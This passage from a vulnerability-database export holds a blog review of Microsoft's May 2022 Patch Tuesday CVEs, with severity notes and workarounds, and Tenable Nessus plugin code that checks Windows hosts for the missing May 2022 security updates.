"https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2022-05-30T13:56:46", "description": "Hello everyone! This episode will be about Microsoft Patch Tuesday for May 2022. Sorry for the delay, this month has been quite intense. As usual, I'm using my [Vulristics](<https://github.com/leonov-av/vulristics>) project and going through not only the vulnerabilities that were presented on May 10th, but all the MS vulnerabilities presented by Microsoft since the previous Patch Tuesday, April 12th. \n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239089>\n\nI have set direct links in comments_links.txt for Qualys, ZDI and Kaspersky blog posts.\n \n \n $ cat comments_links.txt\n Qualys|May 2022 Patch Tuesday: Microsoft Releases 75 Vulnerabilities with 8 Critical; Adobe Releases 5 Advisories, 18 Vulnerabilities with 16 Critical|https://blog.qualys.com/vulnerabilities-threat-research/2022/05/10/may-2022-patch-tuesday\n ZDI|THE MAY 2022 SECURITY UPDATE REVIEW|https://www.zerodayinitiative.com/blog/2022/5/10/the-may-2022-security-update-review\n Kaspersky|Actively exploited vulnerability in Windows|https://www.kaspersky.com/blog/windows-actively-exploited-vulnerability-cve-2022-26925/44305/\n \n $ python3.8 vulristics.py --report-type \"ms_patch_tuesday_extended\" --mspt-year 2022 --mspt-month \"May\" --mspt-comments-links-path \"comments_links.txt\" --rewrite-flag \"True\"\n ...\n MS PT Year: 2022\n MS PT Month: May\n MS PT Date: 2022-05-10\n MS PT CVEs found: 73\n Ext MS PT Date from: 2022-04-13\n Ext MS PT Date to: 2022-05-09\n Ext MS PT CVEs found: 38\n ALL MS PT CVEs: 111\n ...\n\nLet's see the report.\n\n * All vulnerabilities: 110\n * Urgent: 0\n * Critical: 1\n * High: 27\n * Medium: 69\n * Low: 13\n\nThe most dangerous and the only critical vulnerability of this month was actually presented between Patch Tuesdays. 
**Memory Corruption** in Microsoft Edge/Chromium ([CVE-2022-1364](<https://vulners.com/cve/CVE-2022-1364>)). Exploitation in the wild for this vulnerability was mentioned on [AttackerKB](<https://attackerkb.com/topics/2g85mcptOV/cve-2022-1364>) website and it is also in CISA Known Exploited Vulnerabilities Catalog. "Google is aware that an exploit for this vulnerability exists in the wild". This is a first example of the [new Vulristics functionality](<https://avleonov.com/2022/05/23/vulristics-may-2022-update-cvss-redefinitions-and-bulk-adding-microsoft-products-from-ms-cve-data/>). The CVSS Base Score for this vulnerability was added from a third party site, WhiteSource, because it was not available on NVD.\n\nThe most dangerous and most hyped vulnerability among those that were presented directly on Patch Tuesday day is **Spoofing** in Windows Local Security Authority (LSA) ([CVE-2022-26925](<https://vulners.com/cve/CVE-2022-26925>)). The vulnerability can affect all Windows operating systems from Windows 7 (Windows Server 2008 for server systems) and later. It received a CVSSv3 score of 8.1. However, when chained with a new technology LAN manager (NTLM) relay attack, the combined CVSSv3 score for the attack chain is 9.8. According to the advisory from Microsoft, it has been exploited in the wild as a zero-day. An unauthenticated attacker could force domain controllers to authenticate to an attacker-controller server using NTLM. Raphael John, who has been credited by Microsoft for reporting this vulnerability revealed on Twitter that the vulnerability is actually the bug known as [PetitPotam (CVE-2021-36942)](<https://avleonov.com/2021/08/02/last-weeks-security-news-serious-sam-in-metasploit-petitpotam-zimbra-hijack-joint-advisory-top30-cves/>) from August 2021. "[The story behind CVE-2022-26925](<https://twitter.com/raphajohnsec/status/1524402300625858562>) is no advanced reverse engineering, but a lucky accident. 
During my pentests in January and March, I saw that PetitPotam worked against the [domain controllers]". It looks like Microsoft failed to properly fix the PetitPotam vulnerability.\n\nThere were 10 **Remote Code Execution** vulnerabilities in Windows LDAP this month. Vulnerability-management vendors single out [CVE-2022-22012](<https://vulners.com/cve/CVE-2022-22012>) and [CVE-2022-29130](<https://vulners.com/cve/CVE-2022-29130>), because they carry the highest CVSS Base Scores, 9.8. An unauthenticated attacker could send a specially crafted request to a vulnerable server. Successful exploitation could result in the attacker\u2019s code running in the context of the SYSTEM account. These two vulnerabilities are only exploitable if the MaxReceiveBuffer LDAP policy has been raised above its default value; systems running the default value are not vulnerable, so check that policy on affected servers before treating the 9.8 as the effective severity.\n\n**Remote Code Execution** in Windows Network File System ([CVE-2022-26937](<https://vulners.com/cve/CVE-2022-26937>)). This vulnerability could be exploited over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger a Remote Code Execution (RCE). NFS version 4.1 is not impacted by this vulnerability, and Microsoft provides the recommended workaround of disabling NFS versions 2 and 3 for those users who are not able to immediately apply the patch (note that clients which cannot negotiate NFSv4.1 lose access while the workaround is in place). Exploitability Assessment: Exploitation More Likely.\n\n**Remote Code Execution** in Windows Remote Desktop Client ([CVE-2022-22017](<https://vulners.com/cve/CVE-2022-22017>)). An attacker would have to convince a targeted user to connect to a malicious RDP server. Upon connecting, the malicious server could execute code on the victim\u2019s system in the context of the targeted user. Exploitability Assessment: Exploitation More Likely.\n\n**Elevation of Privilege** in Windows Print Spooler ([CVE-2022-29104](<https://vulners.com/cve/CVE-2022-29104>), [CVE-2022-29132](<https://vulners.com/cve/CVE-2022-29132>)). 
These are just the latest in a long line of EoP vulnerabilities Microsoft has addressed in Print Spooler over the last year, several of which have been exploited in attacks.\n\nAn interesting situation has developed around **Elevation of Privilege** in Kerberos ([CVE-2022-26931](<https://vulners.com/cve/CVE-2022-26931>)) and **Elevation of Privilege** in Active Directory ([CVE-2022-26923](<https://vulners.com/cve/CVE-2022-26923>)). Patches for these vulnerabilities caused [service authentication problems](<https://www.bleepingcomputer.com/news/microsoft/microsoft-may-windows-updates-cause-ad-authentication-failures/>) when deployed on Windows Server domain controllers. But within a week the regression was resolved: Microsoft released a workaround and additional [updates for domain controllers](<https://docs.microsoft.com/en-us/windows/release-health/status-windows-11-21h2#you-might-see-authentication-failures-on-the-server-or-client-for-services>). Keep in mind that CVE-2022-26923 lets an authenticated user who controls a computer account obtain a certificate from Active Directory Certificate Services that authenticates with domain-controller-level privilege, so the right response to the regression is to apply the follow-up updates, not to leave domain controllers unpatched.\n\nNone of the vulnerabilities in this episode had a public exploit at the time of writing, but some carry a "Proof-of-Concept Exploit" mark in the Microsoft CVSS Temporal Score. 
Therefore, it is more likely that exploits for them will appear soon.\n\n * **Spoofing** - Microsoft Edge ([CVE-2022-29147](<https://vulners.com/cve/CVE-2022-29147>))\n * **Denial of Service** - Windows Hyper-V ([CVE-2022-22713](<https://vulners.com/cve/CVE-2022-22713>))\n * **Information Disclosure** - Windows Clustered Shared Volume ([CVE-2022-29123](<https://vulners.com/cve/CVE-2022-29123>))\n\nThe full report is available here: [ms_patch_tuesday_may2022_report](<http://avleonov.com/vulristics_reports/ms_patch_tuesday_may2022_report_with_comments_ext_img.html>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-26T21:21:57", "type": "avleonov", "title": "Microsoft Patch Tuesday May 2022: Edge RCE, PetitPotam LSA Spoofing, bad patches", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36942", "CVE-2022-1364", "CVE-2022-22012", "CVE-2022-22017", "CVE-2022-22713", "CVE-2022-26923", "CVE-2022-26925", "CVE-2022-26931", "CVE-2022-26937", "CVE-2022-29104", "CVE-2022-29123", "CVE-2022-29130", "CVE-2022-29132", "CVE-2022-29147"], "modified": "2022-05-26T21:21:57", "id": 
"AVLEONOV:8FE7F4C2B563A2A88EB2DA8822A13824", "href": "https://avleonov.com/2022/05/27/microsoft-patch-tuesday-may-2022-edge-rce-petitpotam-lsa-spoofing-bad-patches/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-01-20T08:16:37", "description": "The remote Windows host is missing security update 5013963. It is, therefore, affected by multiple vulnerabilities\n\n - Windows LDAP Remote Code Execution Vulnerability (CVE-2022-22012, CVE-2022-22013, CVE-2022-22014, CVE-2022-29128, CVE-2022-29129, CVE-2022-29130, CVE-2022-29137, CVE-2022-29139, CVE-2022-29141)\n\n - Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability (CVE-2022-22019)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T00:00:00", "type": "nessus", "title": "KB5013963: Windows 10 LTS 1507 Security Update (May 2022)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": 
false}, "cvelist": ["CVE-2022-21972", "CVE-2022-22011", "CVE-2022-22012", "CVE-2022-22013", "CVE-2022-22014", "CVE-2022-22015", "CVE-2022-22016", "CVE-2022-22019", "CVE-2022-23270", "CVE-2022-26923", "CVE-2022-26925", "CVE-2022-26926", "CVE-2022-26930", "CVE-2022-26931", "CVE-2022-26933", "CVE-2022-26934", "CVE-2022-26935", "CVE-2022-26936", "CVE-2022-29103", "CVE-2022-29104", "CVE-2022-29105", "CVE-2022-29112", "CVE-2022-29114", "CVE-2022-29115", "CVE-2022-29121", "CVE-2022-29125", "CVE-2022-29126", "CVE-2022-29127", "CVE-2022-29128", "CVE-2022-29129", "CVE-2022-29130", "CVE-2022-29132", "CVE-2022-29137", "CVE-2022-29139", "CVE-2022-29141", "CVE-2022-30130", "CVE-2022-30138"], "modified": "2022-11-18T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_MAY_5013963.NASL", "href": "https://www.tenable.com/plugins/nessus/160926", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(160926);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/11/18\");\n\n script_cve_id(\n \"CVE-2022-21972\",\n \"CVE-2022-22011\",\n \"CVE-2022-22012\",\n \"CVE-2022-22013\",\n \"CVE-2022-22014\",\n \"CVE-2022-22015\",\n \"CVE-2022-22016\",\n \"CVE-2022-22019\",\n \"CVE-2022-23270\",\n \"CVE-2022-26923\",\n \"CVE-2022-26925\",\n \"CVE-2022-26926\",\n \"CVE-2022-26930\",\n \"CVE-2022-26931\",\n \"CVE-2022-26933\",\n \"CVE-2022-26934\",\n \"CVE-2022-26935\",\n \"CVE-2022-26936\",\n \"CVE-2022-29103\",\n \"CVE-2022-29104\",\n \"CVE-2022-29105\",\n \"CVE-2022-29112\",\n \"CVE-2022-29114\",\n \"CVE-2022-29115\",\n \"CVE-2022-29121\",\n \"CVE-2022-29125\",\n \"CVE-2022-29126\",\n \"CVE-2022-29127\",\n \"CVE-2022-29128\",\n \"CVE-2022-29129\",\n \"CVE-2022-29130\",\n \"CVE-2022-29132\",\n \"CVE-2022-29137\",\n \"CVE-2022-29139\",\n \"CVE-2022-29141\",\n \"CVE-2022-30130\",\n \"CVE-2022-30138\"\n );\n script_xref(name:\"MSKB\", value:\"5013963\");\n script_xref(name:\"MSFT\", value:\"MS22-5013963\");\n script_xref(name:\"IAVA\", value:\"2022-A-0204-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0203-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0202-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/22\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/09/08\");\n\n script_name(english:\"KB5013963: Windows 10 LTS 1507 Security Update (May 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5013963. 
It is, therefore, affected by multiple vulnerabilities\n\n - Windows LDAP Remote Code Execution Vulnerability (CVE-2022-22012, CVE-2022-22013, CVE-2022-22014,\n CVE-2022-29128, CVE-2022-29129, CVE-2022-29130, CVE-2022-29137, CVE-2022-29139, CVE-2022-29141)\n\n - Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability (CVE-2022-22019)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5013963\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5013963\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-29130\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n 
script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-05';\nkbs = make_list(\n '5013963'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:10240,\n rollup_date:'05_2022',\n bulletin:bulletin,\n rollup_kb_list:[5013963])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-20T14:26:42", "description": "The remote Windows host is missing security update 5014001. 
It is, therefore, affected by multiple vulnerabilities\n\n - Windows LDAP Remote Code Execution Vulnerability (CVE-2022-22012, CVE-2022-22013, CVE-2022-22014, CVE-2022-29128, CVE-2022-29129, CVE-2022-29130, CVE-2022-29137, CVE-2022-29139, CVE-2022-29141)\n\n - Windows Network File System Remote Code Execution Vulnerability (CVE-2022-26937)\n\n - Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T00:00:00", "type": "nessus", "title": "KB5014001: Windows Server 2012 R2 Security Update (May 2022)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21972", "CVE-2022-22011", "CVE-2022-22012", "CVE-2022-22013", "CVE-2022-22014", "CVE-2022-22015", "CVE-2022-22019", "CVE-2022-23270", "CVE-2022-26923", "CVE-2022-26925", "CVE-2022-26926", "CVE-2022-26930", "CVE-2022-26931", "CVE-2022-26933", "CVE-2022-26934", "CVE-2022-26935", "CVE-2022-26936", "CVE-2022-26937", 
"CVE-2022-29102", "CVE-2022-29103", "CVE-2022-29104", "CVE-2022-29105", "CVE-2022-29112", "CVE-2022-29114", "CVE-2022-29115", "CVE-2022-29120", "CVE-2022-29121", "CVE-2022-29122", "CVE-2022-29123", "CVE-2022-29125", "CVE-2022-29126", "CVE-2022-29127", "CVE-2022-29128", "CVE-2022-29129", "CVE-2022-29130", "CVE-2022-29132", "CVE-2022-29134", "CVE-2022-29135", "CVE-2022-29137", "CVE-2022-29138", "CVE-2022-29139", "CVE-2022-29141", "CVE-2022-29150", "CVE-2022-29151", "CVE-2022-30138"], "modified": "2022-10-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_MAY_5014001.NASL", "href": "https://www.tenable.com/plugins/nessus/160931", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(160931);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/10/14\");\n\n script_cve_id(\n \"CVE-2022-21972\",\n \"CVE-2022-22011\",\n \"CVE-2022-22012\",\n \"CVE-2022-22013\",\n \"CVE-2022-22014\",\n \"CVE-2022-22015\",\n \"CVE-2022-22019\",\n \"CVE-2022-23270\",\n \"CVE-2022-26923\",\n \"CVE-2022-26925\",\n \"CVE-2022-26926\",\n \"CVE-2022-26930\",\n \"CVE-2022-26931\",\n \"CVE-2022-26933\",\n \"CVE-2022-26934\",\n \"CVE-2022-26935\",\n \"CVE-2022-26936\",\n \"CVE-2022-26937\",\n \"CVE-2022-29102\",\n \"CVE-2022-29103\",\n \"CVE-2022-29104\",\n \"CVE-2022-29105\",\n \"CVE-2022-29112\",\n \"CVE-2022-29114\",\n \"CVE-2022-29115\",\n \"CVE-2022-29120\",\n \"CVE-2022-29121\",\n \"CVE-2022-29122\",\n \"CVE-2022-29123\",\n \"CVE-2022-29125\",\n \"CVE-2022-29126\",\n \"CVE-2022-29127\",\n \"CVE-2022-29128\",\n \"CVE-2022-29129\",\n \"CVE-2022-29130\",\n \"CVE-2022-29132\",\n \"CVE-2022-29134\",\n \"CVE-2022-29135\",\n \"CVE-2022-29137\",\n \"CVE-2022-29138\",\n \"CVE-2022-29139\",\n 
\"CVE-2022-29141\",\n \"CVE-2022-29150\",\n \"CVE-2022-29151\",\n \"CVE-2022-30138\"\n );\n script_xref(name:\"MSKB\", value:\"5014001\");\n script_xref(name:\"MSKB\", value:\"5014011\");\n script_xref(name:\"MSFT\", value:\"MS22-5014001\");\n script_xref(name:\"MSFT\", value:\"MS22-5014011\");\n script_xref(name:\"IAVA\", value:\"2022-A-0204-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0203-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/22\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/09/08\");\n\n script_name(english:\"KB5014001: Windows Server 2012 R2 Security Update (May 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5014001. It is, therefore, affected by multiple vulnerabilities\n\n - Windows LDAP Remote Code Execution Vulnerability (CVE-2022-22012, CVE-2022-22013, CVE-2022-22014,\n CVE-2022-29128, CVE-2022-29129, CVE-2022-29130, CVE-2022-29137, CVE-2022-29139, CVE-2022-29141)\n\n - Windows Network File System Remote Code Execution Vulnerability (CVE-2022-26937)\n\n - Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5014001\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5014011\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5014001 or Cumulative Update 5014011\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n 
script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-29130\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-05';\nkbs = make_list(\n '5014011',\n '5014001'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3',\n sp:0,\n rollup_date:'05_2022',\n bulletin:bulletin,\n rollup_kb_list:[5014011, 5014001])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-19T18:34:30", "description": "The remote Windows host is missing security update 5013943. 
It is, therefore, affected by multiple vulnerabilities\n\n - Windows LDAP Remote Code Execution Vulnerability (CVE-2022-22012, CVE-2022-22013, CVE-2022-22014, CVE-2022-29128, CVE-2022-29129, CVE-2022-29130, CVE-2022-29131, CVE-2022-29137, CVE-2022-29139, CVE-2022-29141)\n\n - Windows Kernel Elevation of Privilege Vulnerability (CVE-2022-29133)\n\n - Windows Graphics Component Remote Code Execution Vulnerability (CVE-2022-26927)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T00:00:00", "type": "nessus", "title": "KB5013943: Windows 11 Security Update (May 2022)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21972", "CVE-2022-22012", "CVE-2022-22013", "CVE-2022-22014", "CVE-2022-22015", "CVE-2022-22016", "CVE-2022-22017", "CVE-2022-22019", "CVE-2022-23270", "CVE-2022-23279", "CVE-2022-24466", "CVE-2022-26913", "CVE-2022-26923", "CVE-2022-26925", "CVE-2022-26926", "CVE-2022-26927", "CVE-2022-26930", "CVE-2022-26931", "CVE-2022-26933", 
"CVE-2022-26934", "CVE-2022-26935", "CVE-2022-26936", "CVE-2022-26940", "CVE-2022-29103", "CVE-2022-29104", "CVE-2022-29112", "CVE-2022-29113", "CVE-2022-29114", "CVE-2022-29115", "CVE-2022-29116", "CVE-2022-29121", "CVE-2022-29125", "CVE-2022-29126", "CVE-2022-29127", "CVE-2022-29128", "CVE-2022-29129", "CVE-2022-29130", "CVE-2022-29131", "CVE-2022-29132", "CVE-2022-29133", "CVE-2022-29137", "CVE-2022-29139", "CVE-2022-29140", "CVE-2022-29141", "CVE-2022-30138"], "modified": "2022-10-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_MAY_5013943.NASL", "href": "https://www.tenable.com/plugins/nessus/160930", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(160930);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/10/14\");\n\n script_cve_id(\n \"CVE-2022-21972\",\n \"CVE-2022-22012\",\n 